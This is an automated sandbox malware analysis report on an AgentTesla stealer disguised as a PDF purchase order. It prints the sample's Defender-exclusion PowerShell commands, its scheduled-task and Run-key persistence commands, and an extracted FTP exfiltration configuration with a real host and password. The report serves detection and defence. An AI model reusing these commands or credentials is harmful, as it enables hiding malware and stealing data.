Windows Analysis Report
z38PO_20248099-1_pdf.exe

Overview

General Information

Sample name: z38PO_20248099-1_pdf.exe
Analysis ID: 1518233
MD5: 5d5b5ecc06b9058d0ec3199ed8617cfe
SHA1: cbb1a95878e8a7a4ac09270a6dc7699c78996e28
SHA256: 0a58b574ccfb2898c4ee47a8dab29174c2193731573d4578b7b5ff83ad1196d6
Tags: AgentTesla, exe, user-Porcupine
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • z38PO_20248099-1_pdf.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe" MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
    • powershell.exe (PID: 7816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7868 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4888 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7964 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • z38PO_20248099-1_pdf.exe (PID: 8068 cmdline: "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe" MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
    • z38PO_20248099-1_pdf.exe (PID: 8096 cmdline: "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe" MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
  • FrFvspxoHsPs.exe (PID: 8172 cmdline: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
    • schtasks.exe (PID: 5212 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpEC46.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • FrFvspxoHsPs.exe (PID: 764 cmdline: "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe" MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
  • sgxIb.exe (PID: 1792 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
    • schtasks.exe (PID: 2320 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp675.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sgxIb.exe (PID: 3236 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
  • sgxIb.exe (PID: 3592 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
    • schtasks.exe (PID: 1292 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp26DE.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sgxIb.exe (PID: 4216 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author | Strings
00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000018.00000002.3861351736.0000000003091000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000018.00000002.3861351736.0000000003091000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000A.00000002.3860883657.00000000028BC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author | Strings
0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x3317c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x331ee:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x33278:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x3330a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x33374:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x333e6:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3347c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3350c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen
  • 0x30370:$s2: GetPrivateProfileString
  • 0x2f9fa:$s3: get_OSFullName
  • 0x3116b:$s5: remove_Key
  • 0x31357:$s5: remove_Key
  • 0x32275:$s6: FtpWebRequest
  • 0x3315e:$s7: logins
  • 0x336d0:$s7: logins
  • 0x36427:$s7: logins
  • 0x36493:$s7: logins
  • 0x37f12:$s7: logins
  • 0x3702d:$s9: 1.85 (Hash, version 2, native byte-order)
19.2.sgxIb.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

                    System Summary

                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", ParentImage: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, ParentProcessId: 7644, ParentProcessName: z38PO_20248099-1_pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", ProcessId: 7816, ProcessName: powershell.exe
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, ProcessId: 8096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sgxIb
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpEC46.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpEC46.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe, ParentImage: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe, ParentProcessId: 8172, ParentProcessName: FrFvspxoHsPs.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpEC46.tmp", ProcessId: 5212, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", ParentImage: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, ParentProcessId: 7644, ParentProcessName: z38PO_20248099-1_pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp", ProcessId: 7964, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", ParentImage: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, ParentProcessId: 7644, ParentProcessName: z38PO_20248099-1_pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", ProcessId: 7816, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", ParentImage: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, ParentProcessId: 7644, ParentProcessName: z38PO_20248099-1_pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp", ProcessId: 7964, ProcessName: schtasks.exe
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-09-25T14:42:33.783691+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.9 | 49717 | 110.4.45.197 | 21 | TCP
                    2024-09-25T14:42:39.600523+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.9 | 49723 | 110.4.45.197 | 21 | TCP
                    2024-09-25T14:42:48.225577+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.9 | 55430 | 110.4.45.197 | 21 | TCP
                    2024-09-25T14:42:34.626804+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.9 | 49719 | 110.4.45.197 | 58009 | TCP
                    2024-09-25T14:42:34.633344+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.9 | 49719 | 110.4.45.197 | 58009 | TCP
                    2024-09-25T14:42:40.450522+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.9 | 49726 | 110.4.45.197 | 53264 | TCP
                    2024-09-25T14:42:40.459740+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.9 | 49726 | 110.4.45.197 | 53264 | TCP
                    2024-09-25T14:42:49.076789+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.9 | 55431 | 110.4.45.197 | 54539 | TCP
                    2024-09-25T14:42:49.082015+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.9 | 55431 | 110.4.45.197 | 54539 | TCP

                    AV Detection

                    Source: 19.2.sgxIb.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe | ReversingLabs: Detection: 65%
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe | ReversingLabs: Detection: 65%
                    Source: z38PO_20248099-1_pdf.exe | ReversingLabs: Detection: 65%
                    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe | Joe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe | Joe Sandbox ML: detected
                    Source: z38PO_20248099-1_pdf.exe | Joe Sandbox ML: detected
                    Source: z38PO_20248099-1_pdf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49709 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49714 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49720 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:55429 version: TLS 1.2
                    Source: z38PO_20248099-1_pdf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: xaHV.pdbSHA256? source: z38PO_20248099-1_pdf.exe, FrFvspxoHsPs.exe.0.dr, sgxIb.exe.10.dr
                    Source: Binary string: xaHV.pdb source: z38PO_20248099-1_pdf.exe, FrFvspxoHsPs.exe.0.dr, sgxIb.exe.10.dr
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe | Code function: 4x nop then jmp 07114AC0h | 0_2_071145C0
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe | Code function: 4x nop then inc dword ptr [ebp-0Ch] | 11_2_055C5454
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe | Code function: 4x nop then jmp 06D93D60h | 21_2_06D93860

                    Networking

                    Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:55431 -> 110.4.45.197:54539
                    Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49719 -> 110.4.45.197:58009
                    Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49717 -> 110.4.45.197:21
                    Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:55430 -> 110.4.45.197:21
                    Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49723 -> 110.4.45.197:21
                    Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49726 -> 110.4.45.197:53264
                    Source: global traffic | TCP traffic: 110.4.45.197 ports 65044,63289,57088,53264,60779,54891,58978,52851,59326,54510,57687,50852,55829,54539,1,56820,51370,60205,60403,54484,2,58009,63809,56189,51237,50701,60062,21
                    Source: global traffic | TCP traffic: 192.168.2.9:49715 -> 110.4.45.197:54484
                    Source: Joe Sandbox View | IP Address: 172.67.74.152
                    Source: Joe Sandbox View | ASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY
                    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknown | DNS query: name: api.ipify.org
                    Source: unknown | FTP traffic detected: 110.4.45.197:21 -> 192.168.2.9:49712
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                      220-You are user number 26 of 50 allowed.
                      220-Local time is now 20:42. Server port: 21.
                      220-This is a private system - No anonymous login
                      220-IPv6 connections are also welcome on this server.
                      220 You will be disconnected after 15 minutes of inactivity.
                    Source: global traffic | HTTP traffic detected:
                      GET / HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                      Host: api.ipify.org
                      Connection: Keep-Alive
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
                    Source: global traffic | DNS traffic detected: DNS query: ftp.haliza.com.my
                    Source: z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.0000000002C35000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.0000000002AD3000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.00000000035CD000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.0000000003681000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.000000000358E000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.00000000033EB000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1620262791.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.000000000330B000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.haliza.com.my
                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000002.1446067123.0000000002C02000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.000000000284C000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000B.00000002.1494492070.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.0000000003351000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000010.00000002.1556961678.00000000032C2000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1620262791.0000000003071000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000015.00000002.1639610353.0000000002625000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.000000000304C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.000000000284C000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.0000000003351000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1620262791.0000000003071000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.000000000304C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.000000000284C000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.0000000003351000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1620262791.0000000003071000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.000000000304C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.000000000284C000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.0000000003351000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1620262791.0000000003071000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.000000000304C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55429
                    Source: unknown | Network traffic detected: HTTP traffic on port 55429 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, SKTzxzsJw.cs.Net Code: _71ZRqC1D
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.raw.unpack, SKTzxzsJw.cs.Net Code: _71ZRqC1D
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 19.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 19.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
